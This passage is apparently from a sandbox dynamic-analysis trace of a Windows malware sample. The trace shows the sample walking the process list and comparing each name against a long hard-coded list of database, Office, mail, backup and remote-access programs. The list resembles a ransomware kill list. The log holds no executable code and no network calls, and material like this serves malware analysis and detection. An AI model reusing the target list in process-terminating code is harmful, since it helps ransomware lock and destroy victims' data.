msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.827] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0112.829] lstrcmpiW (lpString1="scriptftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, 
Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.829] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0112.832] lstrcmpiW (lpString1="skype.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.832] Process32NextW (in: hSnapshot=0x210, 
lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0112.834] lstrcmpiW (lpString1="smartftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.834] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0112.836] lstrcmpiW (lpString1="thunderbird.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, 
agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.836] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0112.838] lstrcmpiW (lpString1="totalcmd.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, 
winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.838] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0112.839] lstrcmpiW (lpString1="trillian.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, 
schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.840] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0112.841] lstrcmpiW (lpString1="webdrive.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.841] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0112.842] lstrcmpiW (lpString1="whatsapp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.842] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0112.844] lstrcmpiW (lpString1="winscp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, 
encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.844] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0112.845] lstrcmpiW (lpString1="yahoomessenger.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, 
mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.845] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0112.846] lstrcmpiW (lpString1="active-charge.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, 
Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.847] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0112.848] lstrcmpiW (lpString1="accupos.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.848] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 
[0112.849] lstrcmpiW (lpString1="afr38.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.849] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0112.851] lstrcmpiW (lpString1="aldelo.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, 
sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.851] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0112.852] lstrcmpiW (lpString1="ccv_server.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, 